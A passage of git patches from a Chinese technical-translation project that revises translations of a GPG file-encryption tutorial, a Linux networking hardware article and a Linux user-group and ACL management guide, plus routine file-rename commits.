需要知道这个文件的接收者和发送者. 由于这个文件给是你的,因此无需指定发送者,而接收者就是你自己. -You have an encrypted file. Try decrypting it. You don't need to specify any keys. That information is encoded with the file. GPG will try the keys that it has to decrypt it. +### 解密的基本方法 -``` +你收到加密文件后,就需要对它进行解密. 你无需指定解密用的密钥. 这个信息被编码在文件中. GPG 会尝试用其中的密钥进行解密. + +```shel $ gpg -d /tmp/test.txt.gpg ``` -Say you +### 发送文件 +假设你需要发送文件给别人. 你需要有接收者的公钥. 具体怎么获得密钥由你自己决定. 你可以让他们直接把公钥发送给你, 也可以通过密钥服务器来获取. - _do_ +收到对方公钥后, 导入公钥到GPG 中. -need to send the file. You need to have the recipient's public key. How you get that from them is up to you. You can ask them to send it to you, or it may be publicly available on a keyserver. - -Once you have it, import the key into GPG. - -``` +```shell $ gpg --import yourfriends.key ``` -``` +这些公钥与你自己创建的密钥一样,自带了名称和电子邮件地址的信息. +记住,为了让别人能解密你的文件,别人也需要你的公钥. 因此导出公钥并将之发送出去. + +```shell gpg --export -a "Your Name" > your.key ``` +现在可以开始加密要发送的文件了. 它跟之前的步骤差不多, 只是需要指定你自己为发送人. ``` $ gpg -e -u "Your Name" -r "Their Name" /tmp/test.txt ``` -That's mostly it. There are some more advanced options available, but you won't need them ninety-nine percent of the time. GPG is that easy to use. You can also use the key pair that you created to send and receive encrypted email in much the same way as this, though most email clients automate the process once they have the keys. +### 结语 +就这样了. GPG 还有一些高级选项, 不过你在 99% 的时间内都不会用到这些高级选项. GPG 就是这么易于使用. +你也可以使用创建的密钥对来发送和接受加密邮件,其步骤跟上面演示的差不多, 不过大多数的电子邮件客户端在拥有密钥的情况下会自动帮你做这个动作. -------------------------------------------------------------------------------- From 35a7f43a8fa8a02581bffaca2025fcd6fff0ad83 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 21:42:32 +0800 Subject: [PATCH 0312/1627] change to translated --- ...171024 How to Encrypt and Decrypt Individual Files With GPG.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md (100%) diff --git a/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md b/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md similarity index 100% rename from sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md rename to translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md From 93395794ecbfcb4ade7d71e1e5c07ae46ac28c09 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 21:50:49 +0800 Subject: [PATCH 0313/1627] reformat --- ...t and Decrypt Individual Files With GPG.md | 62 +++++++++---------- 1 file changed, 31 insertions(+), 31 deletions(-) diff --git a/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md b/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md index d28e36e358..6b534be640 100644 --- a/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md +++ b/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md @@ -10,7 +10,7 @@ ### 要求 -安装了 GPG 的Linux 或者拥有 root 权限来安装它. +安装了 GPG 的 Linux 或者拥有 root 权限来安装它。 ### 难度 @@ -18,19 +18,19 @@ ### 约定 -* # - 需要使用root权限来执行指定命令,可以直接使用root用户来执行也可以使用sudo命令 +* # - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令 * $ - 可以使用普通用户来执行指定命令 ### 介绍 -加密非常重要. 它对于保护敏感信息来说是必不可少的. -你的私人文件应该要被加密, 而 GPG 提供了很好的解决方案. +加密非常重要。它对于保护敏感信息来说是必不可少的。 +你的私人文件应该要被加密,而 GPG 提供了很好的解决方案。 ### 安装 GPG -GPG 的使用非常广泛. 你在几乎每个发行版的仓库中都能找到它. -如果你还没有安装它,那现在就来安装一下吧. +GPG 的使用非常广泛。你在几乎每个发行版的仓库中都能找到它。 +如果你还没有安装它,那现在就来安装一下吧。 #### Debian/Ubuntu @@ -50,79 +50,79 @@ $ sudo apt install gnupg # emerge --ask app-crypt/gnupg ``` ### Create a Key -你需要一个密钥对来加解密文件. 如果你为 SSH 已经生成过了密钥对,那么你可以直接使用它. -如果没有,GPG包含工具来生成密钥对. +你需要一个密钥对来加解密文件。如果你为 SSH 已经生成过了密钥对,那么你可以直接使用它。 +如果没有,GPG 包含工具来生成密钥对。 ```shell $ gpg --full-generate-key ``` -GPG 有一个命令行程序帮你一步一步的生成密钥. 它还有一个简单得多的工具,但是这个工具不能让你设置密钥类型,密钥的长度以及过期时间,因此不推荐使用这个工具. +GPG 有一个命令行程序帮你一步一步的生成密钥。它还有一个简单得多的工具,但是这个工具不能让你设置密钥类型,密钥的长度以及过期时间,因此不推荐使用这个工具。 -GPG 首先会询问你密钥的类型. 没什么特别的话选择默认值就好. +GPG 首先会询问你密钥的类型。没什么特别的话选择默认值就好。 -下一步需要设置密钥长度. `4096` 是一个不错的选择. +下一步需要设置密钥长度。`4096` 是一个不错的选择。 -之后, 可以设置过期的日期. 如果希望密钥永不过期则设置为 `0` +之后,可以设置过期的日期。 如果希望密钥永不过期则设置为 `0` -然后,输入你的名称. +然后,输入你的名称。 -最后, 输入电子邮件地址. +最后,输入电子邮件地址。 -如果你需要的话,还能添加一个注释. +如果你需要的话,还能添加一个注释。 -所有这些都完成后, GPG 会让你校验一下这些信息. +所有这些都完成后,GPG 会让你校验一下这些信息。 -GPG 还会问你是否需要为密钥设置密码. 这一步是可选的, 但是会增加保护的程度. -若需要设置密码,则 GPG 会收集你的操作信息来增加密钥的健壮性. 所有这些都完成后, GPG 会显示密钥相关的信息. +GPG 还会问你是否需要为密钥设置密码。这一步是可选的, 但是会增加保护的程度。 +若需要设置密码,则 GPG 会收集你的操作信息来增加密钥的健壮性。 所有这些都完成后, GPG 会显示密钥相关的信息。 ### 加密的基本方法 -现在你拥有了自己的密钥, 加密文件非常简单. 使用虾米那命令在 `/tmp` 目录中创建一个空白文本文件. +现在你拥有了自己的密钥,加密文件非常简单。 使用虾米那命令在 `/tmp` 目录中创建一个空白文本文件。 ```shell $ touch /tmp/test.txt ``` -然后用 GPG 来加密它. 这里 `-e` 标志告诉 GPG 你想要加密文件, `-r` 标志指定接收者. +然后用 GPG 来加密它。这里 `-e` 标志告诉 GPG 你想要加密文件, `-r` 标志指定接收者。 ```shell $ gpg -e -r "Your Name" /tmp/test.txt ``` -GPG 需要知道这个文件的接收者和发送者. 由于这个文件给是你的,因此无需指定发送者,而接收者就是你自己. +GPG 需要知道这个文件的接收者和发送者。由于这个文件给是你的,因此无需指定发送者,而接收者就是你自己。 ### 解密的基本方法 -你收到加密文件后,就需要对它进行解密. 你无需指定解密用的密钥. 这个信息被编码在文件中. GPG 会尝试用其中的密钥进行解密. +你收到加密文件后,就需要对它进行解密。 你无需指定解密用的密钥。 这个信息被编码在文件中。 GPG 会尝试用其中的密钥进行解密。 ```shel $ gpg -d /tmp/test.txt.gpg ``` ### 发送文件 -假设你需要发送文件给别人. 你需要有接收者的公钥. 具体怎么获得密钥由你自己决定. 你可以让他们直接把公钥发送给你, 也可以通过密钥服务器来获取. +假设你需要发送文件给别人。你需要有接收者的公钥。 具体怎么获得密钥由你自己决定。 你可以让他们直接把公钥发送给你, 也可以通过密钥服务器来获取。 -收到对方公钥后, 导入公钥到GPG 中. +收到对方公钥后,导入公钥到 GPG 中。 ```shell $ gpg --import yourfriends.key ``` -这些公钥与你自己创建的密钥一样,自带了名称和电子邮件地址的信息. -记住,为了让别人能解密你的文件,别人也需要你的公钥. 因此导出公钥并将之发送出去. +这些公钥与你自己创建的密钥一样,自带了名称和电子邮件地址的信息。 +记住,为了让别人能解密你的文件,别人也需要你的公钥。 因此导出公钥并将之发送出去。 ```shell gpg --export -a "Your Name" > your.key ``` -现在可以开始加密要发送的文件了. 它跟之前的步骤差不多, 只是需要指定你自己为发送人. +现在可以开始加密要发送的文件了。它跟之前的步骤差不多, 只是需要指定你自己为发送人。 ``` $ gpg -e -u "Your Name" -r "Their Name" /tmp/test.txt ``` ### 结语 -就这样了. GPG 还有一些高级选项, 不过你在 99% 的时间内都不会用到这些高级选项. GPG 就是这么易于使用. -你也可以使用创建的密钥对来发送和接受加密邮件,其步骤跟上面演示的差不多, 不过大多数的电子邮件客户端在拥有密钥的情况下会自动帮你做这个动作. +就这样了。GPG 还有一些高级选项, 不过你在 99% 的时间内都不会用到这些高级选项。 GPG 就是这么易于使用。 +你也可以使用创建的密钥对来发送和接受加密邮件,其步骤跟上面演示的差不多, 不过大多数的电子邮件客户端在拥有密钥的情况下会自动帮你做这个动作。 -------------------------------------------------------------------------------- @@ -130,8 +130,8 @@ via: https://linuxconfig.org/how-to-encrypt-and-decrypt-individual-files-with-gp 作者:[Nick Congleton][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[校对者 ID](https://github.com/校对者 ID) -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出 [a]:https://linuxconfig.org From 3265fe318b500cc11c783c26fe9785980c796dd0 Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Tue, 5 Dec 2017 21:53:27 +0800 Subject: [PATCH 0314/1627] Update 20171201 How to find a publisher for your tech book.md --- .../tech/20171201 How to find a publisher for your tech book.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171201 How to find a publisher for your tech book.md b/sources/tech/20171201 How to find a publisher for your tech book.md index 76dc8112ca..6c7cfeecc1 100644 --- a/sources/tech/20171201 How to find a publisher for your tech book.md +++ b/sources/tech/20171201 How to find a publisher for your tech book.md @@ -1,3 +1,5 @@ + +Translating by FelixYFZ How to find a publisher for your tech book ============================================================ From b776726f813e461a8016c29112b091270baa8480 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 22:20:03 +0800 Subject: [PATCH 0315/1627] PRF:20171012 Linux Networking Hardware for Beginners Think Software.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 恭喜你,完成了第一篇翻译! --- ...g Hardware for Beginners Think Software.md | 87 +++++++++---------- 1 file changed, 39 insertions(+), 48 deletions(-) diff --git a/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md index a236a80e97..af79b1e9f0 100644 --- a/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ b/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md @@ -1,72 +1,63 @@ -Translating by FelixYFZ - -面向初学者的Linux网络硬件: 软件工程思想 -============================================================ +面向初学者的 Linux 网络硬件:软件思维 +=========================================================== ![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") - 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 -Commons Zero][3]Pixabay - 上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 -### Routers:路由器 +> 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 +[Commons Zero][3]Pixabay + +上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 + +### 路由器 -网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛, - -图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到Internet上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商提供的电缆箱,调制调节器,卫星上行系统...好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子,当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 - - -### [fig-1.png][4] +网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛。图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到互联网上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商(ISP)提供的电缆箱、调制调节器、卫星上行系统……好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子。当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 ![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") -图一:一个简单的有线局域网和一个无线接入点。 +*图一:一个简单的有线局域网和一个无线接入点。* -一台路由器能连接一切,一个小巧特殊的小盒子只专注于路由,一个大点的盒子将会提供路由,防火墙,域名服务,以及VPN网关功能,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个小模块,体积臃肿矮小的像PC这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。 它们有多路数据总线,多个中央处理器和极快的存储。 -可以通过查阅Juniper和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。 -一个接入你的局域网的无线接入点要么作为一个以太网网桥要么作为一个路由器。一个桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。 -一台路由器连接的是两个不同的网络。 -### Network Topology:网络拓扑 +路由器可以是各种样式:一个只专注于路由的小巧特殊的小盒子,一个将会提供路由、防火墙、域名服务,以及 VPN 网关功能的大点的盒子,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个 Arduino,体积臃肿矮小的像 PC Engines 这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。它们有多路数据总线,多个中央处理器和极快的存储。(可以通过了解 Juniper 和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。) - -有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络,如果你的交换机支持的话,你也可以把它们分配到不同的子网中。 -平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。 -有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。他们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。 -将你的局域网进行分段将会提升安全保障, 把局域网分成可管理的不同网段将有助于管理更大的网络。 - 图2展示了一个分成两个子网的局域网络:内部的有线和无线主机,和非军事区域(从来不知道所所有的工作上的男性术语都是在计算机上键入的?)因为他被阻挡了所有的内部网络的访问。 +接入你的局域网的无线接入点要么作为一个以太网网桥,要么作为一个路由器。桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。一台路由器连接的是两个不同的网络。 +### 网络拓扑 -### [fig-2.png][5] +有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络flat network,也可以把它们划分为不同的子网。如果你的交换机支持 VLAN 的话,你也可以把它们分配到不同的 VLAN 中。 + +平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。 + +平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。它们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。将你的局域网进行分段将会提升安全保障, 把局域网分成可管理的不同网段将有助于管理更大的网络。图二展示了一个分成两个子网的局域网络:内部的有线和无线主机,和一个托管公开服务的主机。包含面向公共的服务器的子网称作非军事区域 DMZ,(你有没有注意到那些都是主要在电脑上打字的男人们的术语?)因为它被阻挡了所有的内部网络的访问。 ![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") -图2:一个分成两个子网的简单局域网。 -即使像图2那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。 -你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 +*图二:一个分成两个子网的简单局域网。* +即使像图二那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 -### Think Software软件思维 +### 软件思维 +你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口、交换机,和线缆是特殊用途的硬件。 +其它的都是通用的商用硬件,而且都是软件来定义它的用途。Linux 是一个真实的网络操作系统,它支持大量的网络操作:网关、虚拟专用网关、以太网桥、网页、邮箱以及文件等等服务器、负载均衡、代理、服务质量、多种认证、中继、故障转移……你可以在运行着 Linux 系统的标准硬件上运行你的整个网络。你甚至可以使用 Linux 交换应用(LISA)和VDE2 协议来模拟以太网交换机。 -你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口,交换机,和线缆是特殊用途的硬件。 -其它的都是通用的商用硬件,而且都是软件来定义它的用途。 -网关,虚拟专用网关,以太网桥,网页,邮箱以及文件等等。 -服务器,负载均衡,代理,大量的服务,各种各样的认证,中继,故障转移...你可以在运行着Linux系统的标准硬件上运行你的整个网络。 -你甚至可以使用Linux交换应用和VDE2协议来模拟以太网交换机,像DD-WRT,openWRT 和Rashpberry Pi distros,这些小型的硬件都是有专业的分类的,要记住BSDS和它们的特殊衍生用途如防火墙,路由器,和网络附件存储。 -你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说有一台硬件计算机和一台软件计算机。 -### Port Trunking and Ethernet Bonding -端口聚合和以太网绑定 -聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起成为一个是他们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 -你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在Linux内核中的,所以不需要任何其他的专门的硬件。 +有一些用于小型硬件的特殊发行版,如 DD-WRT、OpenWRT,以及树莓派发行版,也不要忘记 BSD 们和它们的特殊衍生用途如 pfSense 防火墙/路由器,和 FreeNAS 网络存储服务器。 +你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说硬件计算机和软件计算机一样。 -### Bending Mobile Broadband to your Will随心所欲选择你的移动带宽 +### 端口聚合和以太网绑定 -我期望移动带宽能够迅速增长来替代DSL和有线网络。我居住在一个有250,000人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有20分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动带宽; 这里没有拨号网络,卫星网络(即使它很糟糕)或者是DSL,电缆,光纤,但却没有阻止网络供应商把那些在我这个区域从没看到过的无限制通信个其他高速网络服务的传单塞进我的邮箱。 -我试用了AT&T,Version,和T-Mobile。Version的信号覆盖范围最广,但是Version和AT&T是最昂贵的。 -我居住的地方在T-Mobile信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个WeBoostDe信号放大器和 -一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是WeBoost因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的APP的协助下去设置将会精准的增强 你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 -那个小巧的中兴热点设备能够支持15台主机而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,使用Tomato,openWRT,或者DD-WRT来替代普通的固件,这样你就能完全控制你的防护墙规则,路由配置,以及任何其他你想要设置的服务。 +聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起,成为一个是它们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 + +你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在 Linux 内核中的,所以不需要任何其他的专门的硬件。 + +### 随心所欲选择你的移动宽带 + +我期望移动宽带能够迅速增长来替代 DSL 和有线网络。我居住在一个有 25 万人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有 20 分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动宽带;这里没有拨号网络、卫星网络(即使它很糟糕)或者是 DSL、电缆、光纤,但却没有阻止网络供应商把那些我在这个区域从没看到过的 Xfinity 和其它高速网络服务的传单塞进我的邮箱。 + +我试用了 AT&T、Version 和 T-Mobile。Version 的信号覆盖范围最广,但是 Version 和 AT&T 是最昂贵的。 +我居住的地方在 T-Mobile 信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个 WeBoost 信号放大器和一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是 WeBoost,因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的 APP [SignalCheck Pro][8] 的协助下设置将会精准的增强你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 + +那个小巧的中兴热点设备能够支持 15 台主机,而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,可以使用 Tomato、OpenWRT,或者 DD-WRT 来替代普通的固件,这样你就能完全控制你的防护墙规则、路由配置,以及任何其它你想要设置的服务。 -------------------------------------------------------------------------------- @@ -74,7 +65,7 @@ via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardwar 作者:[CARLA SCHRODER][a] 译者:[FelixYFZ](https://github.com/FelixYFZ) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 498e48cb8397fc6ed84161a6cc861b50ac4145e2 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 22:20:51 +0800 Subject: [PATCH 0316/1627] PUB:20171012 Linux Networking Hardware for Beginners Think Software.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 文章发布地址:https://linux.cn/article-9113-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/FelixYFZ --- ...1012 Linux Networking Hardware for Beginners Think Software.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171012 Linux Networking Hardware for Beginners Think Software.md (100%) diff --git a/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/published/20171012 Linux Networking Hardware for Beginners Think Software.md similarity index 100% rename from translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md rename to published/20171012 Linux Networking Hardware for Beginners Think Software.md From 13c499ec00cb26f1fb6f263f95de3f7cb3528564 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 22:43:09 +0800 Subject: [PATCH 0317/1627] PRF:20171201 How to Manage Users with Groups in Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @imquanquan 翻译的很好,我基本没调整。 --- ...ow to Manage Users with Groups in Linux.md | 70 +++++++------------ 1 file changed, 25 insertions(+), 45 deletions(-) diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md index 1927de6817..c9bbf066cd 100644 --- a/translated/tech/20171201 How to Manage Users with Groups in Linux.md +++ b/translated/tech/20171201 How to Manage Users with Groups in Linux.md @@ -1,13 +1,9 @@ -如何在 Linux 系统中用用户组来管理用户 +如何在 Linux 系统中通过用户组来管理用户 ============================================================ -### [group-of-people-1645356_1920.jpg][1] - ![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) -本教程可以了解如何通过用户组和访问控制表(ACL)来管理用户。 - -[创意共享协议][4] +> 本教程可以了解如何通过用户组和访问控制表(ACL)来管理用户。 当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,某个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。在 Linux 中,这是完全可以实现的。但前提是你必须先了解如何通过用户组和访问控制表(ACL)来管理用户。 @@ -18,36 +14,32 @@ 你需要用下面两个用户名新建两个用户: * olivia - * nathan 你需要新建以下两个用户组: * readers - * editors -olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的信息·。你可以扩展这个任务以适应你其他更大的需求。 +olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 `/DATA` 目录只有读的权限,而 editors 用户组则对 `/DATA` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的信息,你可以扩展这个任务以适应你其他更大的需求。 -我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 +我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 `sudo` 命令,你必须切换到 root 用户来执行这些命令。 ### 创建用户 -我们需要做的第一件事是为我们的实验创建两个用户。可以用 ``useradd`` 命令来创建用户,我们不只是简单地创建一个用户,而需要同时创建用户和属于他们的家目录,然后给他们设置密码。 +我们需要做的第一件事是为我们的实验创建两个用户。可以用 `useradd` 命令来创建用户,我们不只是简单地创建一个用户,而需要同时创建用户和属于他们的家目录,然后给他们设置密码。 ``` sudo useradd -m olivia - sudo useradd -m nathan ``` -我们现在创建了两个用户,如果你看看 ``/home`` 目录,你可以发现他们的家目录(因为我们用了 -m 选项,可以帮在创建用户的同时创建他们的家目录。 +我们现在创建了两个用户,如果你看看 `/home` 目录,你可以发现他们的家目录(因为我们用了 `-m` 选项,可以在创建用户的同时创建他们的家目录。 之后,我们可以用以下命令给他们设置密码: ``` sudo passwd olivia - sudo passwd nathan ``` @@ -59,26 +51,21 @@ sudo passwd nathan ``` addgroup readers - addgroup editors ``` -(译者注:当你使用 CentOS 等一些 Linux 发行版时,可能系统没有 addgroup 这个命令,推荐使用 groupadd 命令来替换 addgroup 命令以达到同样的效果) - - -### [groups_1.jpg][2] +(LCTT 译注:当你使用 CentOS 等一些 Linux 发行版时,可能系统没有 `addgroup` 这个命令,推荐使用 `groupadd` 命令来替换 `addgroup` 命令以达到同样的效果) ![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) -图一:我们可以使用刚创建的新用户组了。 - -[Used with permission][5] +*图一:我们可以使用刚创建的新用户组了。* 创建用户组后,我们需要添加我们的用户到这两个用户组。我们用以下命令来将 nathan 用户添加到 readers 用户组: ``` sudo usermod -a -G readers nathan ``` + 用以下命令将 olivia 添加到 editors 用户组: ``` @@ -89,7 +76,7 @@ sudo usermod -a -G editors olivia ### 给用户组授予目录的权限 -假设你有个目录 ``/READERS`` 且允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: +假设你有个目录 `/READERS` 且允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: ``` sudo chown -R :readers /READERS @@ -107,26 +94,23 @@ sudo chmod -R g-w /READERS sudo chmod -R o-x /READERS ``` -这时候,只有目录的所有者(root)和用户组 reader 中的用户可以访问 ``/READES`` 中的文件。 +这时候,只有目录的所有者(root)和用户组 reader 中的用户可以访问 `/READES` 中的文件。 -假设你有个目录 ``/EDITORS`` ,你需要给用户组 editors 里的成员这个目录的读和写的权限。为了达到这个目的,执行下面的这些命令是必要的: +假设你有个目录 `/EDITORS` ,你需要给用户组 editors 里的成员这个目录的读和写的权限。为了达到这个目的,执行下面的这些命令是必要的: ``` sudo chown -R :editors /EDITORS - sudo chmod -R g+w /EDITORS - sudo chmod -R o-x /EDITORS ``` -此时 editors 用户组的所有成员都可以访问和修改其中的文件。除此之外其他用户(除了 root 之外)无法访问 ``/EDITORS`` 中的任何文件。 +此时 editors 用户组的所有成员都可以访问和修改其中的文件。除此之外其他用户(除了 root 之外)无法访问 `/EDITORS` 中的任何文件。 使用这个方法的问题在于,你一次只能操作一个组和一个目录而已。这时候访问控制表(ACL)就可以派得上用场了。 - ### 使用访问控制表(ACL) -现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限并同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 +现在,让我们把这个问题变得棘手一点。假设你有一个目录 `/DATA` 并且你想给 readers 用户组的成员读取权限,并同时给 editors 